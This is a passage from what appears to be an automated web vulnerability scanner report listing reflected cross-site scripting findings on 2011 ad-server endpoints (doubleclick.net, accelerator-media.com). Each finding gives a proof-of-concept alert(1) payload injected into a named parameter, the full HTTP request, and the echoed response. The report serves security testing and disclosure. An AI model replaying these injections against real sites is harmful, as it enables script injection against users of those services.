document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e093d409'-alert(1)-'ae76b5e7e5a&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig
...[SNIP]...

2.27. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b38'-alert(1)-'182e7bb676f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM128b38'-alert(1)-'182e7bb676f&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Date: Wed, 03 Aug 2011 13:13:49 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM128b38'-alert(1)-'182e7bb676f&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3
...[SNIP]...

2.28. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c920b"-alert(1)-"e348b200b0b was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1c920b"-alert(1)-"e348b200b0b&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6356
Date: Wed, 03 Aug 2011 13:13:43 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1c920b"-alert(1)-"e348b200b0b&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7Esscs%3D%3
...[SNIP]...

2.29. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c9f'-alert(1)-'38d64f32497 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284b8c9f'-alert(1)-'38d64f32497&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6356
Date: Wed, 03 Aug 2011 13:13:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284b8c9f'-alert(1)-'38d64f32497&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399
...[SNIP]...

2.30. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b858"-alert(1)-"13c1c8366ff was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=224352842b858"-alert(1)-"13c1c8366ff&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Date: Wed, 03 Aug 2011 13:13:23 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=224352842b858"-alert(1)-"13c1c8366ff&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399
...[SNIP]...

2.31. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d532'-alert(1)-'1d043040bff was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G1d532'-alert(1)-'1d043040bff&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Date: Wed, 03 Aug 2011 13:13:18 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G1d532'-alert(1)-'1d043040bff&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25
...[SNIP]...

2.32. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7db61"-alert(1)-"ea3173da7b3 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G7db61"-alert(1)-"ea3173da7b3&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Date: Wed, 03 Aug 2011 13:13:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
85348/Backup_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G7db61"-alert(1)-"ea3173da7b3&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25
...[SNIP]...

2.33. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791c5"-alert(1)-"f835b416d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=791c5"-alert(1)-"f835b416d06 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:04 GMT
Expires: Wed, 03 Aug 2011 13:14:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=791c5"-alert(1)-"f835b416d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm
...[SNIP]...

2.34. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63093'-alert(1)-'655f6b8ed5a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=63093'-alert(1)-'655f6b8ed5a HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:09 GMT
Expires: Wed, 03 Aug 2011 13:14:09 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=63093'-alert(1)-'655f6b8ed5ahttp://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399101/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm
...[SNIP]...

2.35. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5808c'-alert(1)-'66a05006c64 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!5808c'-alert(1)-'66a05006c64&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6343
Date: Wed, 03 Aug 2011 13:12:57 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!5808c'-alert(1)-'66a05006c64&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B677
...[SNIP]...

2.36. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d67aa"-alert(1)-"2267e9f64d1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!d67aa"-alert(1)-"2267e9f64d1&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6356
Date: Wed, 03 Aug 2011 13:12:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://s0.2mdn.net/2285348/Backup_300x250_2.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!d67aa"-alert(1)-"2267e9f64d1&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B677
...[SNIP]...

2.37. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.accelerator-media.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>f23b2653513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=120x60&section=17223&IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1 HTTP/1.1
Host: ad.accelerator-media.com
Proxy-Connection: keep-alive
Referer: http://subscription.live-astro.com/free_reading_template.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:12:02 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 03 Aug 2011 13:12:02 GMT
Pragma: no-cache
Content-Length: 4766
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.accelerator-media.com/imageclick?IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1&Z=120x60&s=17223&_salt=1686391806&t=2" target="_parent">
...[SNIP]...

2.38. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.accelerator-media.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ddff"-alert(1)-"a65d95cec7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=120x60&section=17223&IASH=STAND&7ddff"-alert(1)-"a65d95cec7c=1 HTTP/1.1
Host: ad.accelerator-media.com
Proxy-Connection: keep-alive
Referer: http://subscription.live-astro.com/free_reading_template.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 03 Aug 2011 13:12:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 03 Aug 2011 13:12:04 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

